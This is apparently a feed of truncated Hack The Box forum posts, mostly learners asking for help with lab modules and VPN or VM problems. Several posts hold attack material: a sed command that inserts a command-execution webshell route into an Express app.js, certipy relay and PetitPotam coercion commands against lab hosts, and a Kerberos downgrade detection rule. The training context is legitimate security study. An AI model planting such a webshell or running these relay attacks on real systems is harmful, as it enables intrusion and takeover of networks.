Hack The Box Forums
10,010 FOLLOWERS
Hack The Box is an online platform allowing you to test your penetration testing skills and exchange ideas and methodologies with thousands of people in the security field. Come across video tutorials, get knowledge of tools used in hacking, and find various writeups for the same here.
Hack The Box Forums
9h ago
I can’t ping any removed machine, I have the vip and when I ping it tells me From icm_seq=1 Destintation host unrecheable
1 post - 1 participant
Read full topic ..read more
Hack The Box Forums
1d ago
Hello,
I’m looking for help for the Command Execution portion of this module. The task is to write a new API route into the app.js file to create a webshell.
I cannot for the life of me get this working at all locally. Without using the API, I can confirm this command works to rewrite the app.js
sed -i '17i\app.get("/api/cmd", (req, res) => {const cmd = require("child_process").execSync(req.query.cmd).toString(); res.send(cmd);});' src/app.js
Afterwards I can run a GET request to the endpoint to read files.
Whenever I try to do it in the app, all I get are syntax errors. I’ve tried escapi ..read more
Hack The Box Forums
2d ago
There is a file named wannamine.pcap in the /home/htb-student/pcaps directory, which contains network traffic related to the Overpass-the-hash technique which involves Kerberos encryption type downgrading. Replace XX with the appropriate value in the last content keyword of the rule with sid XXXXXXX within the local.rules file so that an alert is triggered as your answer.
$ alert tcp $HOME_NET any → any 88 (msg: “Kerberos Ticket Encryption Downgrade to RC4 Detected”; flow: no_stream, established, to_server; content: “|A1 03 02 01 05 A2 03 02 01 0A|”, offset 12, depth 10; content: “|A1 03 02 01 ..read more
Hack The Box Forums
3d ago
How to. Get into. A. WiFi. Exfinity. On my. Phone. That. Is. Not. Active.
1 post - 1 participant
Read full topic ..read more
Hack The Box Forums
3d ago
Please help been stuck for over 3 hours I progressed farther through the module and completed most of it but I’m very stuck on this question I feel like I’ve typed in most of the records but still seem yet to find the “unique” one.
Any help is appreciated
1 post - 1 participant
Read full topic ..read more
Hack The Box Forums
3d ago
Hello,
I’m French, so excuse my poor English…
I’m connected through an openvpn (on a virtual machine) to the Redeemer machine. I can ping it without any problem.
When I type nmap command, I obtain this answer :
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Is anybody have an idea to help me ?
Thank’s and have a good day !
1 post - 1 participant
Read full topic ..read more
Hack The Box Forums
3d ago
In skill assessment I am using ESC8 and ESC11 attack scenario for first attack. I am stuck I can not connect to target
Here is my commands:
certipy relay -target 172.16.19.5 -template DomainController
I tried to target 172.16.19.77 but no result I also tried to use ```
certipy relay -target "rpc://172.16.19.5" -ca "lab-WS01-CA" -template DomainController
To my second option I used coercer and PetitPotem
python3 PetitPotam.py -u BlWasp -p 'Password123!' -d 'lab.local' 172.16.19.19 172.16.19.3
I also tried to use coercer with above same IP
But I got error
I do not know what to do I need hel ..read more
Hack The Box Forums
3d ago
Hello,
I’m new to HTB and don’t have much experience yet. My problem is that when I make modules and use the vm machine I can’t copy text from outside and paste into Parrot for example. I can copy and paste within the vm, but not from outside. It worked by accident for a day, but I don’t remember what was different. I hope I am posting this question in the right category.
1 post - 1 participant
Read full topic ..read more